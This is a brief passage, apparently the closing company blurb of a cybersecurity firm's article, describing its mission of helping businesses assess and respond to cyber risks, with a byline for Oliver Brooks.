footprint, we are best placed to help businesses identify, assess, mitigate and
respond to the risks they face. We are passionate about making the Internet
safer and revolutionizing the way in which organizations think about
cybersecurity.


Published by Oliver Brooks